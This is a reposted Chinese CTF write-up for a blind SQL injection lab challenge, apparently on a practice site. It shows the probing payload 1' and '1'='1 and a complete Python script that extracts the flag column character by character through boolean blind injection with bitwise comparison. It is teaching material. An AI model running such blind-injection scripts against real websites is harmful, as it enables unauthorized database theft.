iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > Python >6.简单sql注入之3
  • 746
分享到

6.简单sql注入之3

简单sql 2023-01-31 03:01:01 746人浏览 安东尼

Python 官方文档:入门教程 => 点击学习

摘要

进去输入1观察发现:        2,3都只有一个结果Hello!,我们输入4观察一下    发现空白,于是输入sql注入语句:1' and '1'='1        没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于

进去输入1观察发现:

    wKioL1lovzLgSL2-AABHlqiHUio047.png-wh_50

    2,3都只有一个结果Hello!,我们输入4观察一下

    发现空白,于是输入sql注入语句:1' and '1'='1

    wKiom1lov8qw4mAOAABJGHwEveo306.png-wh_50

    没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于Hello!回显的sql注入

    猜测数据库,数据表,字段这些我就不浪费时间写了,有想要了解的道友,可以自行百度,或留言交流,我这里直接写爆破flag表flag字段的代码就好了


代码如下:

#!/usr/bin/python
#coding=utf-8
#Author = One

import requests

def main():
    n = 0
    binary = ""
    flag = ""
    for i in range(1,1000):
        for j in range(8):
            url = "Http://ctf5.shiyanbar.com/WEB/index_3.PHP?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
            request = requests.get(url)
            if(request.text.find('Hello!') != -1):
                binary = '1'+binary
                n = 0
            else:
                binary = '0'+binary
                n += 1
        print chr(int(binary,2)),
        flag += chr(int(binary,2))
        binary = ""
        if(n >= 8):
            print "\n"+flag
            break
        
if __name__ == '__main__':
    main()
#上述代码使用的是按位与方法,比普通循环遍历所有可能字符要快,比较8次必得一个字符结果

即可爆破出结果:

    wKioL1lo0NuyMn-cAAANYKFAzK0484.png-wh_50

本人也是初学者,参考了许多大佬的wp 自己写出来后有什么错误的地方,希望大家指出,谢谢!

--结束END--

本文标题: 6.简单sql注入之3

本文链接: https://www.lsjlt.com/news/187644.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 6.简单sql注入之3
    进去输入1观察发现:        2,3都只有一个结果Hello!,我们输入4观察一下    发现空白,于是输入sql注入语句:1' and '1'='1        没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于...
    99+
    2023-01-31
    简单 sql
  • 简单聊一聊SQL注入及防止SQL注入
    目录SQL注入附防止sql注入的一些建议总结SQL注入 SQL注入是通过操作输入来修改事先定义好的SQL语句,对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入...
    99+
    2024-04-02
  • sql注入之堆叠注入
    一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行...
    99+
    2023-09-09
    sql mysql php 信息安全 网络安全
  • 数据库之SQL注入原理以及过程的简单介绍
    1、产生SQL注入原因 开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤。SQL 注入过程目的性是...
    99+
    2024-04-02
  • pikachu之SQL注入
    一. pikachu介绍 1.1 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 1.2 pikac...
    99+
    2023-09-02
    sql php 安全
  • sql注入语句有哪3种
    sql注入语句有:1、数字型注入点。2、字符型注入点。3、搜索型注入点。数字型注入点多数网页链接结构像 http://xxx.com/user.phpid=1, 基于此种形式的注入,一般被叫做数字型注入点,因为其注入点 id 类型为数字,在...
    99+
    2024-04-02
  • SQL注入教程之报错注入
    目录SQL报错注入概述报错注入的前提条件Xpath类型函数extractvalue()updatexml()其他函数floor()、rand()、count()、group...
    99+
    2024-04-02
  • ASP.NET MVC 3如何让依赖注入实现得更简单
    本篇文章为大家展示了ASP.NET MVC 3如何让依赖注入实现得更简单,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。我没有找到一个完整的示例,只有一些代码片断,于是,我将其整理了一翻,也有一点点个...
    99+
    2023-06-17
  • SQL注入之临时表
    目录 一、什么是临时表: 二、临时表生成场景:  性质1: 性质2: 性质3:  三、临时表与union进阶利用: 四、利用场景: 一、什么是临时表: 是建立在系统临时文件夹中的表;只在当前连接可见,当关闭连接时,MySQL...
    99+
    2023-09-06
    sql mysql 数据库 web安全
  • SQL注入之sqlmap入门学习
    目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称...
    99+
    2023-05-12
    sqlmap入门 sqlmap注入
  • SQL注入篇学习之盲注/宽字节注入
    目录盲注布尔盲注时间盲注盲注函数length() 函数 返回字符串的长度演示语句burp抓包演示宽字节注入php魔术函数开启方式开启效果作用绕过方法宽字节注入总结 盲注 有...
    99+
    2024-04-02
  • 简单聊聊SQL注入的原理以及一般步骤
    目录原理一般利用步骤1.判断注入点2.判断查询字段数3.查数据库名、版本号、用户名等信息4.查询表名5.查询字段名6.查询记录内容总结原理 SQL注入是一种攻击方式,在这种攻击方式中...
    99+
    2024-04-02
  • SQL注入之盲注怎么实现
    这篇文章主要介绍“SQL注入之盲注怎么实现”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“SQL注入之盲注怎么实现”文章能帮助大家解决问题。sql注入——盲注1.回顾...
    99+
    2024-04-02
  • sql注入之万能密码
    asp aspx万能密码 1:”or “a”=”a 2: ‘)or(‘a’=’a 3:or 1=1– 4:’or 1=1– 5:a’or’ 1=1– 6:”or 1=1– 7:’or’a’=’a 8:”or”=”a’=’a ...
    99+
    2023-09-17
    网络安全 Powered by 金山文档
  • sql注入之手工注入的示例分析
    这篇文章将为大家详细讲解有关sql注入之手工注入的示例分析,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。为了方便说明,我们还是用之前的数字型的注入点为例来进行说明。得到字...
    99+
    2024-04-02
  • shell之for循环的3个简单脚本
    (1)打印乘法口诀表#!/bin/sh for i in {1..9} #取1-9的数字 do  for n in {1..9} #取1-9的数字  do  [ $i -ge $n ] && echo -n "${i}x${...
    99+
    2023-01-31
    脚本 简单 shell
  • 如何避免表单sql注入
    避免表单sql注入的方法:将所有独立的单引号替换成双引号。删除用户输入内容中的所有连字符。限制表单或查询字符串输入的长度。检查用户输入的合法性,确信输入的内容只包含合法的数据。将用户登录名称、密码等数据加密保存。检查提取数据查询所返回的记录...
    99+
    2024-04-02
  • MyBatis下SQL注入攻击的3种方式
    目录前言Mybatis框架下易产生SQL注入漏洞的情况主要分为以下三种:1、模糊查询2、in 之后的多个参数3、order by 之后二、实战思路三、总结前言 SQL注入漏洞作为WE...
    99+
    2024-04-02
  • sql注入教程之类型以及提交注入
    目录参数类型明确请求方法1.GET请求2.POST請求3.COOKIE注入4.http头注入总结参数类型 这里说的参数是源码中存在注入的地方。 其中参数类型有:数字、字符、搜索、js...
    99+
    2024-04-02
  • Spring注解之@Import的简单介绍
    目录普通类ImportSelector实现类DeferredImportSelector实现类附:@Import相关源码解析总结 @Import可以导入以下几种种类: 普通...
    99+
    2022-12-23
    spring注解import @import注解 spring import注解
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作